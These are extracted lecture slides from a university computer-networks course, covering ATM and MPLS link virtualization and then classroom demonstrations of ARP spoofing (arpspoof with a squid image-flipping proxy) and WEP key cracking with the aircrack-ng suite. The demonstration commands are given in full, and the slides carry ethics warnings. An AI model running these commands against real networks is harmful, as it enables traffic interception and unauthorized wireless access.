null  null
CIS3210 – Computer Networks
Link Layer – Virtualization, Vulnerabilities, Security
1
Jason Ernst, University of Guelph - Fall 2011
Housekeeping

A3 available this weekend

3M scholarship
Outline

Link Virtualization

ARP Spoofing


Proof of concept – “Upsidedownternet”
ARP Replay

Proof of concept – WEP cracking
Recall: Link Virtualization

A way to make different underlying network technologies
work together using IP

Ex) ATM, MPLS, 2G cellular networks etc.
Recall ATM (Asynchronous Transfer Mode)


1990’s/00 standard for high-speed (155Mbps to 622
Mbps and higher) Broadband Integrated Service Digital Network
architecture
Goal: integrated, end-end transport of carry voice, video, data
 meeting timing/QoS requirements of voice, video (versus
Internet best-effort model)
 “next generation” telephony: technical roots in telephone
world
 packet-switching (fixed length packets, called “cells”) using
virtual circuits
ATM Architecture



adaptation layer: only at edge of ATM network
 data segmentation/reassembly
 roughly analagous to Internet transport layer
ATM layer: “network” layer
 cell switching, routing
physical layer
ATM: Network or Link Layer?
Vision: end-to-end transport:
“ATM from desktop to
desktop”
 ATM is a network
technology
Reality: used to connect IP
backbone routers
 “IP over ATM”
 ATM as switched link
layer, connecting IP
routers
IP
network
ATM
network
ATM Adaptation Layer (AAL)



ATM Adaptation Layer (AAL): “adapts” upper layers (IP
or native ATM applications) to ATM layer below
AAL present only in end systems, not in switches
AAL layer segment (header/trailer fields, data) fragmented
across multiple ATM cells
 analogy: TCP segment in many IP packets
ATM Adaptation Layer (AAL) [more]
Different versions of AAL layers, depending on ATM service class:



AAL1: for CBR (Constant Bit Rate) services, e.g. circuit emulation
AAL2: for VBR (Variable Bit Rate) services, e.g., MPEG video
AAL5: for data (eg, IP datagrams)
User data
AAL PDU
ATM cell
ATM Layer
Service: transport cells across ATM network
 analogous to IP network layer
 very different services than IP network layer
Network
Architecture
Internet
Service
Model
Guarantees ?
Congestion
Bandwidth Loss Order Timing feedback
best effort none
ATM
CBR
ATM
VBR
ATM
ABR
ATM
UBR
constant
rate
guaranteed
rate
guaranteed
minimum
none
no
no
no
yes
yes
yes
yes
yes
yes
no
yes
no
no (inferred
via loss)
no
congestion
no
congestion
yes
no
yes
no
no
ATM Layer: Virtual Circuits

VC transport: cells carried on VC from source to dest






call setup, teardown for each call before data can flow
each packet carries VC identifier (not destination ID)
every switch on source-dest path maintain “state” for each passing connection
link,switch resources (bandwidth, buffers) may be allocated to VC: to get
circuit-like perf.
Permanent VCs (PVCs)
 long lasting connections
 typically: “permanent” route between to IP routers
Switched VCs (SVC):
 dynamically set up on per-call basis
ATM VCs


Advantages of ATM VC approach:
 QoS performance guarantee for connection mapped to VC
(bandwidth, delay, delay jitter)
Drawbacks of ATM VC approach:
 Inefficient support of datagram traffic
 one PVC between each source/dest pair) does not scale
(N*2 connections needed)
 SVC introduces call setup latency, processing overhead for
short lived connections
ATM Layer: ATM cell (similar to a packet)


5-byte ATM cell header
48-byte payload
 Why?: small payload -> short cell-creation delay for
digitized voice
 halfway between 32 and 64 (compromise!)
Cell header
Cell format
ATM cell header




VCI: virtual channel ID
 will change from link to link thru net
PT: Payload type (e.g. RM cell versus data cell)
CLP: Cell Loss Priority bit
 CLP = 1 implies low priority cell, can be discarded if
congestion
HEC: Header Error Checksum
 cyclic redundancy check
ATM Physical Layer (more)
Two pieces (sublayers) of physical layer:
 Transmission Convergence Sublayer (TCS): adapts ATM layer
above to PMD sublayer below
 Physical Medium Dependent: depends on physical medium
being used
TCS Functions:
 Header checksum generation: 8 bits CRC
 Cell delineation
 With “unstructured” PMD sublayer, transmission of idle cells
when no data cells to send
ATM Physical Layer
Physical Medium Dependent (PMD) sublayer

SONET/SDH: transmission frame structure (like a
container carrying bits);
 bit synchronization;
 bandwidth partitions (TDM);
 several speeds: OC3 = 155.52 Mbps; OC12 = 622.08 Mbps; OC48
= 2.45 Gbps, OC192 = 9.6 Gbps


TI/T3: transmission frame structure (old telephone
hierarchy): 1.5 Mbps/ 45 Mbps
unstructured: just cells (busy/idle)
IP-Over-ATM
Classic IP only
 3 “networks” (e.g., LAN
segments)
 MAC (802.3) and IP
addresses
IP over ATM
 replace “network” (e.g.,
LAN segment) with ATM
network
 ATM addresses, IP
addresses
ATM
network
Ethernet
LANs
Ethernet
LANs
IP-Over-ATM
app
transport
IP
Eth
phy
IP
AAL
Eth
ATM
phy phy
ATM
phy
Translation occurs at
edge routers /
gateways
ATM
phy
app
transport
IP
AAL
ATM
phy
Datagram Journey in IP-over-ATM Network

at Source Host:





IP layer maps between IP, ATM dest address (using ARP)
passes datagram to AAL5
AAL5 encapsulates data, segments cells, passes to ATM layer
ATM network: moves cell along VC to destination
at Destination Host:
 AAL5 reassembles cells into original datagram
 if CRC OK, datagram is passed to IP
IP-Over-ATM
Issues:
 IP datagrams into ATM
AAL5 PDUs
 from IP addresses to
ATM addresses
 just like IP addresses
to 802.3 MAC
addresses!
ATM
network
Ethernet
LANs
Multiprotocol label switching (MPLS)

initial goal: speed up IP forwarding by using fixed length
label (instead of IP address) to do forwarding


borrowing ideas from Virtual Circuit (VC) approach
but IP datagram still keeps IP address!
PPP or Ethernet
header
MPLS header
label
20
IP header
Exp S TTL
3
1
5
remainder of link-layer frame
MPLS capable routers


a.k.a. label-switched router
forwards packets to outgoing interface based only on label
value (don’t inspect IP address)


signaling protocol needed to set up forwarding




MPLS forwarding table distinct from IP forwarding tables
RSVP-TE
forwarding possible along paths that IP alone would not allow
(e.g., source-specific routing) !!
use MPLS for traffic engineering
must co-exist with IP-only routers
MPLS forwarding tables
in
label
out
label dest
10
12
8
out
interface
A
D
A
0
0
1
in
label
out
label dest
out
interface
10
6
A
1
12
9
D
0
R6
0
0
D
1
1
R3
R4
R5
0
0
R2
in
label
8
out
label dest
6
A
out
interface
0
in
label
6
outR1
label dest
-
A
A
out
interface
0
Outline

Link Virtualization

ARP Spoofing


Proof of concept – “Upsidedownternet”
ARP Replay

Proof of concept – WEP cracking
ARP Spoofing Proof of Concept

Recall ARP is used to notify nodes the mapping between
IP address and machine address

If a node does not know the machine address of
particular node, it sends out an ARP request to all other
nodes
ARP Spoofing Proof of Concept

If a node is located between the requesting node and the
default gateway…


It can answer the ARP request first (man in the middle attack)
It can pretend that it is the default gateway, and manipulate the
traffic
ARP Spoofing Proof of Concept

In our case, we will do this by manipulating caching!


(using a proxy)
Recall: caching is used to store content in an intermediate
place reducing RTT and the load on the server out in the
Internet
The Proxy


The tool we will use is the “squid” proxy
This is important because we can tell squid to run an
external program as we handle the request

We will use this program to manipulate the traffic
Important Squid Settings

Allow traffic from expected ip ranges



Make the proxy transparent (so we don’t need to tell
browsers there is a proxy)


acl localnet 192.168.0.0/16 for example
http_access allow localnet
http_port 3128 transparent
Set the program that will run when we serve the page

url_rewrite_program /usr/local/bin/flip.pl
Flip program
Flip Program

Should be put in /usr/local/bin
Permissions should be set to 755
Requires imagemagick package (mogrify part of it)

Can be changed to do other things!





Change image to kittens
Redirect to a default login page (many coffee shops use this as
a capability!)
Etc…
Setting up routes for the proxy

Our ARP attack will force traffic to our machine, but it
will still be arriving on port 80, we need to translate it to
port 3128 (the squid port)

We also want to make sure the computer to be able to
route (act like a gateway)
Setting up routes for the proxy
Translation to correct port
Allow routing
The ARP Attack

Uses a tool called arpspoof

(can get from dsniff ubuntu package)

arpspoof –t “target ip” “gateway ip”

Repeatedly sends ARP replies to the IP of the target with
gateway IP mapped to your MAC address
What happens from here…

The target computer should start sending traffic through
your machine to the real gateway

If it is http traffic on port 80 it will get changed to the
squid port and sent to the proxy

The proxy will request the images from the servers, flip
them, store them and send the flipped image to the target
Results (before)
Results (after)
ARP Spoofing Proof of Concept

Upsidedownternet:



http://www.ex-parrot.com/pete/upside-down-ternet.html
https://help.ubuntu.com/community/Upside-DownTernetHowTo
http://www.debian-administration.org/users/johns/weblog/1
Ethics

This is just a proof of concept, should not be used in
practice at a real coffee shop, or at the University!
Outline

Link Virtualization

ARP Spoofing


Proof of concept – “Upsidedownternet”
ARP Replay

Proof of concept – WEP cracking
ARP Replay

Another vulnerability of ARP

Repeatedly send intercepted arp requests with the hope that
the gateway / access point will continue to send replies

Access point may think that the original response was lost, and
resent without another thought
ARP Replay

Why is this useful?

Generates more traffic on the network

Can be used to decrease service levels, increase load on the
access point etc.

Most importantly, if the network is using WEP – increases the
amount of encrypted traffic being sent from the access point
from the ARP response
WEP Cracking

Relies on capturing “initialization vectors” IV, the more of
the these which are captured, the easier it is to infer the
WEP key

More information available here:
http://www.isaac.cs.berkeley.edu/isaac/wep-faq.html and here:
http://www.aircrackng.org/doku.php?id=simple_wep_crack&DokuWiki=edac829ea
ed7c68d3bd3fbf3d82c084e
The Idea

The network should have one associated user already

(It is possible to do the attack without a user by a fake
association with the access point, but we won’t cover this
today)

We will pretend we are this device by waiting for one of
their ARP requests and then re transmitting it again and
again

At the same time, as the router responds we will capture
the responses
Tools: aircrack-ng suite

Airmon-ng



Turns monitor mode on, on the wireless card (similar to
promiscuous mode on Ethernet)
Allows us to see packets which are not destined for our device
Airodump-ng


Captures the packets from the access point
Can be set to dump into a file
Tools: aircrack-ng suite

Aireplay-ng


Performs the ARP attack, replays any ARP requests from the
target device
Aircrack-ng

Uses the captured packets to figure out the wireless key
Enabled monitor mode

sudo airmon-ng



Must be run as root
First lists the available interfaces
sudo airmon-ng start wlan0


Starts monitor mode on first wireless interface (may be
different depending on your wireless interfaces)
Usually creates a monitor mode interface on mon0
Displaying available networks & encyption
used on them

sudo airodump-ng mon0



Will periodically switch channels and display how many packets
are being sent over the channel to particular access points
This information can be used to select the network to attack
sudo airodump-ng –c 1 –bssid 00:1C:F0:68:1D:C2 –w test mon0

This will stay on channel 1, and filter only packets to or from
the base station with the MAC address above

Also writes the captured packets out to a file for later use
ARP Replay

sudo aireplay-ng -b 00:1C:F0:68:1D:C2 –h 68:a3:c4:f9:06:a0 -3 mon0

Looks for ARP requests to the access point at
00:1C:F0:68:1D:C2 with the source 68:A3:C4:F9:06:A0
(the target device)

-3 is ARP replay attack
The attack
sudo airmon-ng start wlan0
sudo airodump-ng –c 1 –bssid 00:1C:F0:68:1D:C2 –w test mon0
sudo aireplay-ng -b 00:1C:F0:68:1D:C2 –h 68:a3:c4:f9:06:a0 -3 mon0
After some time has passed and we notice there are many IVs captured we
can run the aircrack-ng tool on the “test” data files
aircrack-ng *.cap
Ethics

Again, it is unethical to use this attack in practice. But it is
good to demonstrate the weakness in WEP and
vulnerabilities related to ARP and the link layer
Next Class

Finish up with link layer / physical layer

Assignment #3 overview

Simulation topics for A3
Was this manual useful for you? yes no
Thank you for your participation!

* Your assessment is very important for improving the work of artificial intelligence, which forms the content of this project

Download PDF

advertisement